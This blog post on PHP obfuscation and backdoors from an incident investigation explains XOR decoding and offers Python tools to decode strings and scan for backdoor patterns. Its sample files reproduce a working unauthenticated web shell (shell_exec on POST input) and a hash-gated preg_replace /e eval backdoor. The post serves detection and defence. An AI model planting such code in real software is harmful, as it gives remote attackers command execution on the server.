:PHP Obfuscation and Backdoors – Part 2:
On to the backdoors. There are many different types out there, but here are a few that were encountered during the investigation.
More preg_replace goodness:
We found the caret again and used PHP to get the hidden gems inside. If you are looking to do this yourself instead of trying to find tools to do it for you, install PHP and then run "php -a" from your shell to get an interactive prompt. From the php prompt you can run the following:
php > $code = "c4uUf"^"P\x1929"; print $code;
This should give the output 3-Gl, which is the decoded string now held in $code. Two PHP rules are worth knowing when you do this by hand: the caret on two strings XORs them byte by byte and truncates the result to the length of the shorter operand, so the trailing f in the first operand is silently dropped; and \x takes one or two hex digits, so \x19 is a single byte and the 2 and 9 after it are literal characters, which is why the second operand is only four bytes long. Back to the backdoors! Printing out the data from preg_replace gives us the information below.
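The same decoding as an added example that is not part of the original post: a small Python script that finds every "a"^"b" expression in a PHP source file and decodes it without PHP installed, which is handy when a file contains dozens of these. It reimplements the two PHP rules that are easy to get wrong by hand, the double-quoted-string escapes (\x takes one or two hex digits) and the truncation of string XOR to the shorter operand. Only the first expression in the constructed sample comes from the page; the second is made up for the demo.

```python
from __future__ import annotations
import re

# Escapes PHP decodes inside a double-quoted literal. Anything else after a
# backslash is left untouched, which is also what PHP does.
_DQ_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
              "f": "\f", "\\": "\\", "$": "$", '"': '"'}
_DQ_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')

# A "..."^"..." or '...'^'...' expression. Groups 1/2 hold the left literal
# (double- or single-quoted), groups 3/4 the right one.
_DQ_LIT = r'"((?:\\.|[^"\\])*)"'
_SQ_LIT = r"'((?:\\.|[^'\\])*)'"
_XOR_EXPR = re.compile(rf"(?:{_DQ_LIT}|{_SQ_LIT})\s*\^\s*(?:{_DQ_LIT}|{_SQ_LIT})")


def php_unescape_dq(raw: str) -> str:
    """Decode a PHP double-quoted literal body. \\x takes 1-2 hex digits, so
    the source text P\\x1929 becomes the four bytes P, 0x19, '2', '9'."""
    def repl(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)
        return _DQ_SIMPLE[esc]
    return _DQ_ESCAPE.sub(repl, raw)


def php_unescape_sq(raw: str) -> str:
    """Single-quoted PHP literals only understand \\\\ and \\'."""
    return re.sub(r"\\([\\'])", r"\1", raw)


def php_str_xor(a: str, b: str) -> str:
    """PHP's ^ on two strings: byte-wise XOR, truncated to the shorter operand.
    Assumes ASCII/latin-1 input, so one character is one byte."""
    n = min(len(a), len(b))
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a[:n], b[:n]))


def decode_xor_literals(php_source: str) -> list[tuple[str, str]]:
    """Return (expression as written, decoded value) for every literal^literal
    expression in php_source."""
    found = []
    for m in _XOR_EXPR.finditer(php_source):
        dq_l, sq_l, dq_r, sq_r = m.groups()
        left = php_unescape_dq(dq_l) if dq_l is not None else php_unescape_sq(sq_l)
        right = php_unescape_dq(dq_r) if dq_r is not None else php_unescape_sq(sq_r)
        found.append((m.group(0), php_str_xor(left, right)))
    return found


# Constructed sample: the first line is the expression from the page, the
# second is invented for this demo (it decodes to "eval").
SAMPLE = r'''<?php
$code = "c4uUf"^"P\x1929";
$fn   = "\x04\x14\x02\x08" ^ "abcd";
'''

if __name__ == "__main__":
    for expr, value in decode_xor_literals(SAMPLE):
        print(f"{expr:36} -> {value!r}")
```

Run it against a whole file with `decode_xor_literals(open(path).read())`; expressions that XOR a literal against a variable or a function result are deliberately not matched, since those need the surrounding code to resolve.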
Looking into isset a bit: all it returns is true or false (true when the variable exists and is not null). So the first part of this code is making sure that ch is defined, that php_code is defined, and that the hash hardcoded in the file (which has been removed from the image) matches the hash of whatever was supplied in ch. We can reasonably assume that ch carries the password for the backdoor and that the hardcoded hash is how it is verified. If any of the isset checks or the hash comparison fails, the backdoor stops there and does not carry out the requested action.
Speaking of requests, back to php.net to take a look at what $_REQUEST is. A note on that page says that $_REQUEST cannot be trusted: its contents come from GET, POST and cookie data (which of those are merged, and in what order, is controlled by the request_order and variables_order ini settings), so a remote user can set any of it. That is exactly what the owner of the backdoor did: they supplied ch and php_code remotely, those values either passed or failed the isset and hash checks, and on success whatever code was in php_code was executed.
The second backdoor is a bit more blatant and open to the world. When grepping for cmd, we found a file that contained multiple references to it.
This specific backdoor was dropped on the system within roughly the last year, so this compromise was a bit more recent. Viewing the page from the outside, all you are presented with is a text box and a "Go" button. The code here largely explains itself. Entering netstat, for example, makes a POST request to the server, which attempts to run netstat on the command line; the output is then returned on the page via the if statement at the end of the code. This backdoor has no authentication in front of it and was available to anyone who found it.
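To turn the two patterns above into something you can grep for, here is an added example (not code from the original post) that scans PHP source for the indicators both backdoors rely on: preg_replace with the e modifier, an eval-like or shell-executing function fed from a request superglobal, and a hash of request input compared against a constant. The three sample files are constructed reconstructions of the patterns described, not the files from the investigation; the md5 in the first one is an assumption, since the page does not say which hash function was used.

```python
from __future__ import annotations
import re

# Request superglobals a remote user controls.
_INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"

# preg_replace whose first argument is a quoted pattern: group 1 is the quote,
# group 2 the delimiter, group 3 the modifiers after the closing delimiter.
_PREG = re.compile(r"preg_replace\s*\(\s*([\"'])(.).*?\2([a-zA-Z]*)\1")
# eval-style and shell-style sinks fed from a request superglobal on the same line.
_EVAL = re.compile(r"\b(?:eval|assert|create_function)\s*\(.*" + _INPUT)
_SHELL = re.compile(r"\b(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\(.*" + _INPUT)
# A hash of request input compared against something: the password gate above.
_HASH_GATE = re.compile(r"\b(?:md5|sha1|crc32|hash)\s*\(\s*" + _INPUT + r".*?===?")


def _preg_e_modifier(line: str) -> bool:
    m = _PREG.search(line)
    return m is not None and "e" in m.group(3)


INDICATORS = [
    ("preg_replace with /e modifier", _preg_e_modifier),
    ("eval-like call on request input", lambda l: _EVAL.search(l) is not None),
    ("shell function on request input", lambda l: _SHELL.search(l) is not None),
    ("hash comparison gating on request input", lambda l: _HASH_GATE.search(l) is not None),
]


def scan_php(path: str, source: str) -> list[tuple[str, int, str]]:
    """Return (path, line number, indicator) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, matches in INDICATORS:
            if matches(line):
                hits.append((path, lineno, label))
    return hits


def scan_all(files: dict[str, str]) -> list[tuple[str, int, str]]:
    return [hit for path, src in files.items() for hit in scan_php(path, src)]


# Constructed reconstructions of the two backdoors described above plus one
# benign file; paths and the md5 choice are assumptions for this demo.
SAMPLE_FILES = {
    "wp-content/uploads/cache.php": r'''<?php
if (isset($_REQUEST['ch']) && isset($_REQUEST['php_code']) && md5($_REQUEST['ch']) == '<hash removed>') {
    preg_replace("/.*/e", $_REQUEST['php_code'], "");
}
''',
    "images/go.php": r'''<?php
echo '<form method="post"><input type="text" name="cmd"><input type="submit" value="Go"></form>';
if (isset($_POST['cmd'])) {
    echo '<pre>' . shell_exec($_POST['cmd']) . '</pre>';
}
''',
    "includes/helper.php": r'''<?php
function clean($s) { return preg_replace('/\s+/', ' ', $s); }
$name = htmlspecialchars($_GET['name'] ?? '');
''',
}

if __name__ == "__main__":
    for path, lineno, label in scan_all(SAMPLE_FILES):
        print(f"{path}:{lineno}: {label}")
```

Each regex works on a single line, so a backdoor that spreads its check over several lines needs the lines joined first, and the list of sinks is a starting point rather than a complete one. Note that the benign helper file produces no hits even though it calls preg_replace and reads $_GET: the modifier and the sink are what matter, not the function name alone.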
We hope that the information here will help you search for and identify malicious code in your environment and give you a better understanding of what the code may be doing. If there are any questions I could answer, please leave a comment or contact me directly at email@example.com.